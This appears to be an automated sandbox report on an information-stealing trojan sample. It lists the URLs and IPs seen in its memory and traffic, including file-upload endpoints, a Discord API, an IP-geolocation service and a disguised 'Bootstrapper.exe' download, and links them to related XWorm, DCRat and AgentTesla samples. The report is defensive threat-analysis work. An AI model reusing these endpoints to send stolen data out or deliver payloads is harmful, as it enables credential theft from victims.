                                                                                                                      https://www.newtonsoft.com/jsonschemabound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://google.com/mailSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://packaging.python.org/specifications/entry-points/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462110032.000001DCB6130000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6330000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://www.python.org/psf/license/)SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pySecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459508599.000001DCB55F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msibound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C15000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://foss.heptapod.net/pypy/pypy/-/issues/3539SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1461987753.000001DCB6030000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412628978.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5D0C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5F3D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://127.0.0.1:6463bound.exe, 00000011.00000002.1605507236.00000254B6B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://google.com/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.nodejs.orgbound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://ocsp.sectigo.com0SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://tools.ietf.org/html/rfc7231#section-4.3.6)SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409064610.000001DCB5E95000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412898887.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://99ab5d9c.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exebound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://api.gofile.io/getServerr~SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://contoso.com/Licensepowershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://discordapp.com/api/v9/users/SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB53C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://ip-api.com/json/?fields=225545rSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459084495.000001DCB5340000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://github.com/urllib3/urllib3/issues/2920SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
https://api.gofile.io/getServerr~r | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1458864486.000001DCB3A68000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://yahoo.com/ | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://www.rfc-editor.org/rfc/rfc825 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5EFB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB5935000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://html.spec.whatwg.org/multipage/ | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5EFB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414028733.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EEB000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462238296.000001DCB6230000.00000004.00001000.00020000.00000000.sdmp | false | unknown
https://www.rfc-editor.org/rfc/rfc8259#section-8.1 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E1F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E1F000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://contoso.com/ | powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6AA1000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmp | false | unknown
http://crl.micft.cMicRosof | powershell.exe, 0000000B.00000002.1534955775.000001E373933000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://api.gofile.io/getServer | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp | false | unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp | false | unknown
https://nodejs.org | bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp | false | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://sectigo.com/CPS0 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/ | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5E54000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://ocsp.thawte.com0 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://json.org | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5CED000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://api.anonfiles.com/uploadr# | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://upx.sf.net | Amcache.hve.29.dr | false | URL Reputation: safe | unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
172.67.203.125 | getsolara.dev | United States | US | 13335 | CLOUDFLARENET | false
208.95.112.1 | ip-api.com | United States | US | 53334 | TUT-AS | true
128.116.123.4 | edge-term4-fra2.roblox.com | United States | US | 22697 | ROBLOX-PRODUCTION | false
104.20.23.46 | nodejs.org | United States | US | 13335 | CLOUDFLARENET | false
IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1543368
Start date and time: 2024-10-27 18:43:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 35
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@43/44@7/5
EGA Information:
• Successful, ratio: 50%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target bound.exe, PID 7976 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7820 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
Time | Type | Description
13:44:27 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
13:44:28 | API Interceptor | 99x Sleep call for process: powershell.exe modified
13:44:32 | API Interceptor | 46x Sleep call for process: bound.exe modified
13:44:44 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
172.67.203.125 | cgqdM4IA7C.exe | Get hash | malicious | XWorm | Browse
  | oIDX88LpSs.exe | Get hash | malicious | XWorm | Browse
  | hKWBNgRd7p.exe | Get hash | malicious | XWorm | Browse
  | SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe | Get hash | malicious | Unknown | Browse
  | SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe | Get hash | malicious | Unknown | Browse
  | BootstrapperV1.19.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
  | RHUENHera1.exe | Get hash | malicious | AsyncRAT, XWorm | Browse
  | SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe | Get hash | malicious | Unknown | Browse
  | SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exe | Get hash | malicious | Unknown | Browse
208.95.112.1 | 5K9iuU0ALY.exe | Get hash | malicious | Blank Grabber, XWorm | Browse | ip-api.com/line/?fields=hosting
  | hQr269FZU1.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
  | loader.exe | Get hash | malicious | DCRat | Browse | ip-api.com/line/?fields=hosting
  | transferencia interbancaria_667553466579.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            New Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            fEv4R2ahiLCQa5O.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            PW68YarHboeikgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                            • ip-api.com/json
                                                                                                                                                                                                            transferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            www.nodejs.orgcgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            getsolara.devcgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                            SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                            8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                            edge-term4-fra2.roblox.comoIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            nodejs.orgcgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            ROBLOX-PRODUCTIONUSla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.110.16
                                                                                                                                                                                                            cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 128.116.21.4
                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                                                                            • 128.116.44.3
                                                                                                                                                                                                            https://www.roblox.sc/users/294681399108/profileGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.122.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.44.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.44.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.44.4
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                            TUT-ASUS5K9iuU0ALY.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                                                                                                                                            • 208.95.112.1
  hQr269FZU1.exe | malicious | XWorm
    • 208.95.112.1
  loader.exe | malicious | DCRat
    • 208.95.112.1
  transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla
    • 208.95.112.1
